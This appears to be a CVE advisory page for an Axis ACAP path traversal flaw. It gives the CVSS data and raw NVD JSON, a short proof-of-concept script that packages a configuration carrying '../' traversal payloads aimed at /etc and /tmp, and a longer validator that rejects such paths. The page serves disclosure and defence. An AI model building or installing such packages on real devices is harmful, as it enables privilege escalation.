Security Vulnerability Report
CVE-2026-0804 CVSS 6.7 MEDIUM

CVE-2026-0804

Published: 2026-05-12 07:16:10
Last Modified: 2026-05-12 07:16:10

Description

An ACAP configuration file lacked sufficient input validation, which could allow a path traversal attack leading to potential privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

For the specific affected versions, refer to the official Axis security advisory (CVE-2026-0804pdf-en-US-530732.pdf).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import zipfile

# Description: Proof of Concept for generating a malicious ACAP package.
# This script creates a zip file containing a configuration file with a
# path traversal payload.

# Malicious configuration content.
# The 'LogFile' and 'TargetFile' values attempt to write to sensitive
# system locations using '../'.
malicious_config = """
[Application]
Name=MaliciousApp
Version=1.0

[Configuration]
# Path traversal payload
LogFile=../../../../../etc/passwd_pwned
TargetFile=../../../../../tmp/root_script.sh
"""


def generate_malicious_acap(filename):
    # Create a temporary directory structure for the ACAP
    os.makedirs("acap_payload", exist_ok=True)
    config_path = os.path.join("acap_payload", "package.conf")
    with open(config_path, "w") as f:
        f.write(malicious_config)

    # Create the ACAP package (zip file) with package.conf at its root
    with zipfile.ZipFile(filename, "w") as zf:
        zf.write(config_path, arcname="package.conf")

    print(f"[+] Malicious ACAP package generated: {filename}")
    print("[+] Payload includes path traversal in configuration.")
    print("[+] Note: Target device must allow installation of unsigned ACAPs.")


# Usage
if __name__ == "__main__":
    generate_malicious_acap("malicious_axis.acap")
```
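
The root cause named in the description is missing path validation (CWE-35), and the PoC above shows the shape of the payload. As an added example, not code from Axis or from the author of the PoC, here is the check the installer side should apply: confine every path-valued configuration key to the application's own directory and refuse anything that escapes it, plus a pre-install audit of a zip-shaped package laid out the way the PoC builds it. The INI layout, the LogFile/TargetFile keys, the /usr/local/packages/<Name> install root and both sample configurations are assumptions modelled on the PoC; the real ACAP package format is not shown on this page.

```python
import configparser
import io
import posixpath
import zipfile

# Constructed sample configurations (not from the Axis advisory). The INI
# layout and the LogFile/TargetFile keys mirror the PoC above; the real
# ACAP package.conf format is an assumption not shown on this page.
MALICIOUS_CONF = """\
[Application]
Name=MaliciousApp
Version=1.0

[Configuration]
# Path traversal payload, as in the PoC
LogFile=../../../../../etc/passwd_pwned
TargetFile=../../../../../tmp/root_script.sh
"""

BENIGN_CONF = """\
[Application]
Name=GoodApp
Version=1.0

[Configuration]
LogFile=logs/app.log
TargetFile=./data/state.db
"""

# Configuration keys that hold file-system paths (assumed set).
PATH_KEYS = ("LogFile", "TargetFile")

# Assumed per-application install root: each app gets INSTALL_ROOT/<Name>.
INSTALL_ROOT = "/usr/local/packages"


def confine(base: str, untrusted: str) -> str:
    """Resolve `untrusted` under `base` and return the absolute result, or
    raise ValueError if it would land outside `base`.

    The check is lexical only (normpath). On a real device, follow it with
    os.path.realpath() so a symlink inside `base` cannot re-open the escape.
    """
    if "\x00" in untrusted:
        raise ValueError("NUL byte in path")
    if posixpath.isabs(untrusted):
        raise ValueError(f"absolute path not allowed: {untrusted!r}")
    base = posixpath.normpath(base)
    joined = posixpath.normpath(posixpath.join(base, untrusted))
    if joined != base and not joined.startswith(base + "/"):
        raise ValueError(f"path escapes {base}: {untrusted!r}")
    return joined


def audit_config(conf_text: str) -> dict:
    """Parse an INI-shaped config and confine every path-valued key.

    Returns {"app": name, "ok": {key: resolved_path}, "rejected": {key: reason}}.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case so "LogFile" stays "LogFile"
    cp.read_string(conf_text)

    name = cp.get("Application", "Name", fallback="")
    # The app name becomes a directory component, so it is untrusted too.
    if not name or "/" in name or "\x00" in name or name in (".", ".."):
        raise ValueError(f"bad application name: {name!r}")
    base = posixpath.join(INSTALL_ROOT, name)

    result = {"app": name, "ok": {}, "rejected": {}}
    for key in PATH_KEYS:
        value = cp.get("Configuration", key, fallback=None)
        if value is None:
            continue
        try:
            result["ok"][key] = confine(base, value)
        except ValueError as err:
            result["rejected"][key] = str(err)
    return result


def build_package(conf_text: str, member: str = "package.conf") -> bytes:
    """Build an in-memory zip with the layout the PoC writes (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, conf_text)
    return buf.getvalue()


def audit_package(zip_bytes: bytes) -> dict:
    """Pre-install audit of a zip-shaped package: reject member names that
    traverse out of the extraction directory, then audit package.conf."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for n in zf.namelist():
            if posixpath.isabs(n) or ".." in n.split("/"):
                raise ValueError(f"zip member escapes extraction dir: {n!r}")
        confs = [n for n in zf.namelist() if posixpath.basename(n) == "package.conf"]
        if not confs:
            raise ValueError("no package.conf in package")
        return audit_config(zf.read(confs[0]).decode("utf-8"))


if __name__ == "__main__":
    for label, conf in (("malicious", MALICIOUS_CONF), ("benign", BENIGN_CONF)):
        print(label, audit_package(build_package(conf)))
```

Run against the PoC's payload, both LogFile and TargetFile are rejected because they resolve to /etc and /tmp rather than under the app's directory, while the benign configuration passes with fully resolved paths. The audit also covers the package layer, since a member name such as ../package.conf is the same traversal one level earlier. Note that none of this helps if the device accepts unsigned packages and the validation runs in the installer only; the description's precondition (unsigned ACAP installation enabled) is the setting to turn off first.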

References

https://www.axis.com/dam/public/51/64/ea/cve-2026-0804pdf-en-US-530732.pdf (Axis security advisory, as listed in the NVD record below)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-0804",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T07:16:09.597",
    "lastModified": "2026-05-12T07:16:09.597",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An ACAP configuration file lacked sufficient input validation, which could allow a path traversal attack leading to potential privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-35"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.axis.com/dam/public/51/64/ea/cve-2026-0804pdf-en-US-530732.pdf",
        "source": "[email protected]"
      }
    ]
  }
}
```